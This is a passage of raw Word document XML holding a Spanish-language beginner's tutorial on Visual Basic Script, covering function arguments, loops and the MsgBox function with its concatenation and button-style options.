              <w:t>Variable, False, 1)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="276" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="4" w:right="318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End if Next</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matematicas(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>numero,modo</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>,valor)</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If modo = True Then</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matematicas = numero + valor</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Else</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Matematicas = numero - valor</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End If</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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4001"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l principio Variable tiene el valor 0.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="11"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mpezamos un bucle de 100 repetición. Si variable es &lt;= 50… llamamos a la función sumando a variable 2. Si no, llamamos a la función restando a variable 1.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="276" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="139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in de la Condicional. Fin del Bucl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ón con tres argumentos.</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i modo es Verdadero sumamos.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="533"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umamos valor al numero dado. Si modo es Falso restamos.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="747"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tamos valor al numero dado. Fin de la Condicional Fin de la Función.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="898"/>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ejemplo es </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>largo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> pero no por ello complejo. Si bien, este es nuestro primer encuentro con funciones complejas. Solo decir que en una función existe lo que se llaman </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>argumentos</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. En la función </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3) hay un argumento que es numérico. En el caso de esta hay tres argumentos (</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>los argumentos se separan por comas</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>), dos numéricos y el de en medio booleano. Sabido esto, no hay más misterio con el código. Mas adelante, cuando explique más funciones, no solo os acostumbrareis, sino que lo comprenderéis mejor. Aún es pronto para querer hacer nada serio.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="77" w:right="138"/>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Programación en Visual Basic Script: Funciones Gráficas</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ntes de empezar con las funciones ya mas serias (pero aún básicas), es el momento de aprender las funciones gráficas, mas que nada para poder empezar a practicar y saber con seguridad que está pasando en nuestro script. Estas funciones son dos: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El Cuadro de Dialogo y El Cuadro de Mensaje</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, y sirven para mostrar la información de las variables en pantalla, y/o interactuar con el usuario dejando que sea el quien de valores a las variables. Empecemos pues por el Cuadro de Mensaje, que es la función MsgBox.</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La función MsgBox crea un cuadro de mensaje con el siguiente aspecto (puede variar):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="280" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="112"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5378450" cy="1016000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5378450" cy="1016000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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l cuadro de mensaje puedes </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>editar</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>mensaje</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>titulo</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lang w:val="es-ES"/>
        </w:rPr>
        <w:t>imagen de la izquierda</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y los </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>botones que aparecen</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Por otro lado, el cuadro de mensaje va unido a una variable, para poder saber cual de todos los botones se ha pulsado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="322"/>
        <w:ind w:left="93" w:right="170"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El cuadro de mensaje básico (el tercero de los que hay arriba) se hace con el siguiente código, que es la versión más simple de todas (obviamos de nuevo la creación de variables):</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Variable = MsgBox("Mensaje",0,"Titulo")</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es el nombre de la variable que acompaña al MsgBox y recibirá información del botón pulsado, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Mensaje</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> es el mensaje que se muestra en el cuadro de mensaje (argumento de texto, que puede suplirse por una variable de cadena), </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Titulo</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> es el titulo de este (del mismo tipo que Mensaje) y 0 es el numero magico que indica la imagen, el numero de botones, el botón predeterminado y el tipo de mensaje a la vez. En breve explicaré detalladamente como tratar este numero “mágico”, por ahora va siendo hora de que abras el bloc de notas y empieces a probar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="10"/>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Si en el Mensaje desea colocar comillas, saltos de línea o una referencia a otra variable (es decir, que muestre lo que tiene) debe realizarlo </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>uniendo las expresiones</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> con el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>símbolo de concatenación</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (&amp;) de la siguiente manera (igual que dándole valor a una variable de cadena):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="7377" w:type="dxa"/>
        <w:tblInd w:w="21" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="26" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6458"/>
        <w:gridCol w:w="956"/>
        <w:gridCol w:w="545"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="380"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6485" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="sing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Variable = MsgBox("Mensaje"&amp;chr(13)&amp;"Mensaje2",0,"Titulo")</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="892" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="00000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406"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7377" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="double" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="sing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Variable = MsgBox("Mensaje"&amp;chr(34)&amp;"Mensaje2"&amp;chr(34),0,"Titulo")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="604"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="544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MsgBox("Mensaje "&amp;Variable2,0,"Titulo") </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1933" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:left w:val="double" w:sz="2" w:space="0" w:color="00000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bl>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quedaría respectivamente así, probadlo y comprobadlo:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1362"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3790950" cy="1210310"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2567" name="Picture 2567"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="2567" name="Picture 2567"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3790950" cy="1210310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>En el primero</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, hay dos mensajes en dos líneas. El mensaje uno esta unido con un símbolo de concatenación a una constante de VBScript que equivale a un salto de línea (se explicó anteriormente), y este, con otro símbolo de concatenación al segundo mensaje. Todo esto esta puesto en la zona del mensaje </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>separado de las demás con una coma fuera de las comillas</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</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b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>En el segundo</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> hay un mensaje y otro entre comillas. El mensaje uno esta unido con un símbolo de concatenación a la función Chr(x) que equivale a las comillas ("), y este, con otro símbolo de concatenación al mensaje dos. Después esta otra constante igual a la anterior unida con otro símbolo de concatenación para así cerrar las comillas que habíamos abierto anteriormente de la misma manera.</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b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>En el tercero</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> primero damos el valor dos a la variable "</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Variable2</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>", aunque le podeis dar cualquier valor, numérico o de cadena. Lugo ponemos un mensaje unido con un símbolo de concatenación a la variable "</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Variable2</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>" lo cual nos mostrara solo su valor. Es decir, que podemos mostrar en pantalla el valor de las variables.</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El siguiente ejemplo muestra una mezcla de los tres casos anteriores que son los más comunes, y lo que más se suele utiliza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Variable2 = "¡Hola! "</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3 = 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
        </w:pBdr>
        <w:spacing w:after="56"/>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 xml:space="preserve">Variable2&amp;"Tengo "&amp;chr(34)&amp;Variable3&amp;chr(34)&amp;" perro."&amp;chr(13)&amp;"¡Adios!",0,"Titulo") </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="280" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="3192"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1466850" cy="1181100"/>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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1466850" cy="1181100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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Si metemos esto dentro de un bucle For, de forma que Variable3 aumente (</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>For variable3=1 To 10</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">), tendremos un total de 10 mensajes en los que irá aumentando la cantidad de perros que tienes. </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>No estaría mal, una vez llegados aquí, repasar todo lo visto mostrando los resultados con esta función para comprobar sus efectos y practicar</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="336"/>
        <w:ind w:left="93" w:right="16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ero continuemos, en el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>segundo campo</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, (el que contiene el numero “magico”) hay que introducir un numero, el cual definirá la imagen, el numero de botones, el botón predeterminado y el tipo de mensaje. Para saber que numero hay que poner para que te salga un mensaje así o asa, debes escoger una opción de cada una de las tablas siguientes y sumar sus valores, y el resultado colocarlo en lugar del 0:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="3" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="689" w:right="715" w:hanging="192"/>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Alternativo*</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Comic Sans MS"/>
          <w:b/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:tab/>
        <w:t>Valor</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Comic Sans MS"/>
          <w:b/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Función que realiza </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>vbOKOnly</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">   0</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Muestra sólo el botón </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Aceptar</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="0" w:line="270"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vbOKCancel</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">   1</w:t>
      </w:r>
